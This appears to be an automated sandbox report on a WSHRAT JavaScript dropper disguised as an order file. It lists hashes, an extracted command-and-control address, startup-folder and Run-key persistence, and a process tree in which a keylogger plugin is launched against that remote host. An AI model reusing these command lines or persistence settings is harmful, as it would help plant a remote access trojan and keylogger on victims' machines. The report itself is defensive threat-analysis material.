Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
17-06-2024 11:10
Static task
static1
Behavioral task
behavioral1
Sample
ORDER-24617-01667859-24.js
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
ORDER-24617-01667859-24.js
Resource
win10v2004-20240611-en
General
-
Target
ORDER-24617-01667859-24.js
-
Size
7KB
-
MD5
f3e6a7eba2bd6ca312768ac1560bad6f
-
SHA1
04a683416a38f3c8acf06b64fd5e598a2902f684
-
SHA256
7a06aaf3103d9dce60c0c4652fd505c7a8df42c826d486be1973008d1c22c838
-
SHA512
4ea84c8c33a0fa6a235f6b5ec620e172a5ea5f4a9f372307ea9e1946d6393326bec448e32cadacb1c444270c973046a09be3c590fb7ae61fcc76999553e03265
-
SSDEEP
48:95jUotZH9ZR0/kdlZK8rflZPos9ZPfBjBZfo5CvA7ehZvKoN69ZLi1t16r1SBZ5B:T0/ZYbukAKdrKBXB1XBdi
Malware Config
Extracted
wshrat
http://jinvestments.duckdns.org:7044
Signatures
-
Blocklisted process makes network request 25 IoCs
Processes:
wscript.exewscript.exeflow pid process 3 2176 wscript.exe 7 2480 wscript.exe 9 2480 wscript.exe 10 2480 wscript.exe 11 2480 wscript.exe 12 2480 wscript.exe 13 2480 wscript.exe 14 2480 wscript.exe 15 2480 wscript.exe 17 2480 wscript.exe 18 2480 wscript.exe 19 2480 wscript.exe 21 2480 wscript.exe 22 2480 wscript.exe 23 2480 wscript.exe 25 2480 wscript.exe 26 2480 wscript.exe 27 2480 wscript.exe 29 2480 wscript.exe 30 2480 wscript.exe 31 2480 wscript.exe 33 2480 wscript.exe 34 2480 wscript.exe 35 2480 wscript.exe 37 2480 wscript.exe -
Drops startup file 2 IoCs
Processes:
WScript.exewscript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HTYBQC.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HTYBQC.vbs wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
kl-plugin.exepid process 2152 kl-plugin.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
WScript.exewscript.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" wscript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 ip-api.com -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 556 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
taskkill.exedescription pid process Token: SeDebugPrivilege 556 taskkill.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
kl-plugin.exepid process 2152 kl-plugin.exe 2152 kl-plugin.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
wscript.exeWScript.exewscript.execmd.exedescription pid process target process PID 2176 wrote to memory of 2752 2176 wscript.exe WScript.exe PID 2176 wrote to memory of 2752 2176 wscript.exe WScript.exe PID 2176 wrote to memory of 2752 2176 wscript.exe WScript.exe PID 2752 wrote to memory of 2480 2752 WScript.exe wscript.exe PID 2752 wrote to memory of 2480 2752 WScript.exe wscript.exe PID 2752 wrote to memory of 2480 2752 WScript.exe wscript.exe PID 2480 wrote to memory of 2028 2480 wscript.exe cmd.exe PID 2480 wrote to memory of 2028 2480 wscript.exe cmd.exe PID 2480 wrote to memory of 2028 2480 wscript.exe cmd.exe PID 2028 wrote to memory of 556 2028 cmd.exe taskkill.exe PID 2028 wrote to memory of 556 2028 cmd.exe taskkill.exe PID 2028 wrote to memory of 556 2028 cmd.exe taskkill.exe PID 2480 wrote to memory of 2152 2480 wscript.exe kl-plugin.exe PID 2480 wrote to memory of 2152 2480 wscript.exe kl-plugin.exe PID 2480 wrote to memory of 2152 2480 wscript.exe kl-plugin.exe PID 2480 wrote to memory of 2152 2480 wscript.exe kl-plugin.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ORDER-24617-01667859-24.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HTYBQC.vbs"2⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\HTYBQC.vbs"3⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM kl-plugin.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\kl-plugin.exe"C:\Users\Admin\AppData\Roaming\kl-plugin.exe" jinvestments.duckdns.org 7044 "WSHRAT|F4850773|EILATWEW|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 6/17/2024|Visual Basic-v2.0|GB:United Kingdom" 14⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5LT06Y3\json[1].jsonFilesize
297B
MD5be2ba1a8c142b5fa2178396ac67cb7d8
SHA1b7c3d209d9c95d4b67d7ffb3c777d07f398260a5
SHA2561191fa5928ed7ebf51830c0e601a327fb6480e4f35d9f96962c828b5b45ea260
SHA512cca824422ebcc194e96c6af6c66160409b6c4f9e30af387921ad55712fc4316866e7ac3b2806427f7e06e43e99ef56e612738261f8d38fb58ef2758dc13c9204
-
C:\Users\Admin\AppData\Local\Temp\HTYBQC.vbsFilesize
832KB
MD59eb84b410320b27a000a848a1c22b91c
SHA17b84f1301c73993648f0bdf254f1fc202a12aab8
SHA256f44a15168c937d547a57015ccdf034d5f958fa9e9a159e09730b09acb17124dc
SHA5129ab878e70322df08ebe934e18b30d7b151f49a27ca99fafefa77fdd81ef3ed05700671d0e0dc22842355995fd2c5dc39442d60a9559635eda11ca17194d2d203
-
C:\Users\Admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\user.configFilesize
1KB
MD56adab4c76fc078ab342c1543663b25b8
SHA130f33a9d2ef56dfc9e5f8b48ebb38c5e4503e8c3
SHA256367d9883f14feff7473dd6936c4378e25c1829de2d5e835e767185b8637e5d3a
SHA5125162d86367bf0b02c123835098f5f141d5c36691e7d211684e9fed4b15185690ea3c8d2406d2432899ca64a58fde4743e640950c62480704bdce855a84131339
-
C:\Users\Admin\AppData\Roaming\kl-plugin.exeFilesize
25KB
MD57099a939fa30d939ccceb2f0597b19ed
SHA137b644ef5722709cd9024a372db4590916381976
SHA256272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a
SHA5126e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721